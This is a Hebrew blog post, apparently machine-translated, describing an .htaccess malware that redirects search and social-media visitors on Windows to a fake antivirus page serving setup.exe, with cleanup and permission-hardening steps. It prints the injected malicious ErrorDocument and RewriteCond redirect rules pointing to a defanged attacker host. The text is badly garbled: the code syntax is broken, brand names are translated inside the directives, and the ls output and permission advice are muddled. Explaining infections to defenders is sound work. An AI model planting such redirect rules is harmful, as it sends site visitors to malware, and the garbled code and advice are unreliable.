תוכנה זדונית / וירוס - htaccess. "לשכתב" ולהפנות

צורה חדשה של וירוס שאני רואה לא יודע הרבה, להשפיע אתרים המתארחים על שרתים לא אמינים שבו חשבונות המשתמשים / תת חשבונות יכולים "לראות" אחד את השני. באופן ספציפי, חשבונות אירוח כולם לשים בתיקייה "vhosts"כתיבה וזכותו של תיקיית משתמש את "vhosts" ניתן משתמש ... משווק כללי ברוב המצבים. זוהי שרתי אינטרנט טיפוסי שאינם משתמשים WHM / cPanel.

הפעולה של הנגיף Htaccess -.. האק Htaccess

וירוס משפיע על קבצים .htaccess אתר של הקורבן. הוספתי קווים / הוראה אל להפנות את המבקרים (לבאים מYahoo, MSN, גוגל, פייסבוק, yaindex, טוויטר, מייספייס, וכו 'אתרים ופורטלים בעלי תעבורה גבוהה) לכמה אתרי אינטרנט המציעים "האנטי וירוס. "זה אנטי וירוס מזויף, שבו כתב בהקדמה ל .

כך .htaccess השפיע: (לא לגשת לכתובות אתרי תוכן בשורות הבאות)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

שכתוב

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * תחתית. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * ויקיפדיה. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * אידו. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * טוויטר. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * פייסבוק. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * גוגל * $ [NC, או].
RewriteCond% {HTTP_REFERER}. * חי. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * בינג. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * אמזון. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * EBay. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * פליקר. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * יאהו. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * לשאול. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * אקסייט. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * נטסקייפ. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * HotBot. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * גוטו. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * מאמא. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * חיפוש. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Metacrawler. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * דואר. * $ [NC, או]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule. * [R, L]

% RewriteCond {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond% {REQUEST_FILENAME} * Jpg $ |!.. * Gif $ |. * Png $
RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule. * [R, L]

אלה שמשתמשים בוורדפרס ימצאו את השורות האלה בקובץ .htaccess מ public_html. בנוסף, הווירוס יוצר htaccess זהה. בתיקייה wp-תוכן.

*ישנם גם מצבים בהם מתרחש במקום peoriavascularsurgery.com dns.thesoulfoodcafe.com או כתובות אחרות.

מה הופך את הווירוס הזה.

ברגע שיופנה, המבקר התקבל בזרועות פתוחות על ידי ההודעה:

אזהרה!
המחשב שלך מכיל סימנים שונים של וירוסים ונוכחות תוכניות זדוניות. המיידי שלך דורש לבדוק את המערכת של אנטי וירוס!
מערכת ביטחון תבצע סריקה מהירה והחופשית של המחשב שלך לאיתור וירוסים ותוכנות זדוניות.

1 תוכנות זדוניות

לא משנה על איזה כפתור נלחץ, אנו נלקחים לדף "המחשב שלי"נוצר כדי לחקות עיצוב XP. זה מתחיל באופן אוטומטי "סריקה" שבסופו אנו מוצאים כי "נגועים".

2 תוכנות זדוניות

לאחר הלחיצה על אישור או ביטול, הוא יתחיל להורדהקובץ של setup.exe. זה setup.exe הוא אנטי וירוס מזויף המשפיע על המערכת. שלך להתקין כמה תוכנות זדוניות כדי להפיץ וירוס קישורים נוסף, וחוץ מזה אלה תוכנה אנטי וירוס (הכל נכון) שהקורבן הוא מוזמן לקנות.
מי שכבר פנה לווירוס יכול להשתמש בטופס זה . מומלץ גם לסרוק את כל הדיסק הקשיח. להמליץ קספרסקי אינטרנט סקיוריטי או Kaspersky Anti-Virus.

סוג זה של וירוס משפיע על מערכות הפעלת OS המבקר Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 ו-Windows 95. עד כה אין מקרים ידועים של זיהום של מערכות ההפעלה Windows Vista ו-Windows 7.

כיצד נוכל להסיר קובץ htaccess וירוס. זה בשרת, וכיצד ניתן למנוע זיהום.

1. ניתוח קבצים חשודים וקודי מחיקה. על מנת להבטיח שהקובץ לא רק השפיע .htaccess הוא טוב יותר לנתח את כל הקבצים . Php si . Js.

2. שכתוב קובץ htaccess. ואני מגדיר את chmod 644 או 744 עם גישה לכתוב רק משתמש בעל.

3. בעת יצירת חשבון אירוח עבור אתר אינטרנט בתיקייה / בית או / Webroot זה יהיה באופן אוטומטי ליצור תיקייה אשר לעתים קרובות יש את שמו של המשתמש (משתמש לcPanel, FTP, וכו '). כדי למנוע נתוני כתיבה והעברת וירוסים ממשתמש אחד למשנהו, מומלץ שכל תיקיית משתמש כדי להיות מוגדרת:

chmod או 644 744, 755 - מוצג הנו 644.
chown-R nume_folder nume_user.
chgrp-R nume_user nume_folder

LS-כל דרכים כדי לבדוק אם הם נעשו בצורה נכונה. אמור להופיע משהו כזה:

drwx-X-X 12 Dinamics Dinamics מאי 4096 6 14: 51 Dinamics /
drwx-X-X 10 דוראן דוראן מרץ 4096 7 07: 46 דוראן /
צינור drwx-X-X 12 4096 ינואר 29 11 צינורות: צינורות 23 /
drwxr-XR-X 14 4096 פבואר 26 2009 אקספרס צ'ק אאוט /
drwxr-XR-X 9 א.ז.ו. א.ז.ו. מאי 4096 19 01: 09 א.ז.ו. /
drwx-X-X פארמה פארמה 9 4096 דצמבר 19 22: 29 פארמה /

אם אחד מהאמור לעיל יהיה userele FTP קבצים נגועיםזה לא יכול לשלוח את הנגיף למארח משתמש אחר. זוהי רשת ביטחון מינימאלית להגן על החשבונות המתארחים בשרת אינטרנט.

אלמנטים משותפים של האזורים שנפגעו על ידי סוג זה של וירוס.

כל האזורים שנפגעו מבקרים הפניה לאתרים לפי שם תחום המכילים "/".

זה "וירוס htaccess."משפיע על כל סוג של מערכת ניהול תוכן (ג'ומלה, וורדפרס, phpBBוכו ') המשתמש .htaccess.

Htaccess. הפניה האק וירוס &.

תוכנה זדונית / וירוס - htaccess. "לשכתב" ולהפנות

על הסופר

התגנבות LP

מייסד ועורך הגדרות התגנבותבתאריך 2006.
ניסיון במערכות הפעלת לינוקס (במיוחד CentOS), Mac OS X, Windows XP> Windows 10 וורדפרס (CMS).

השאירו תגובה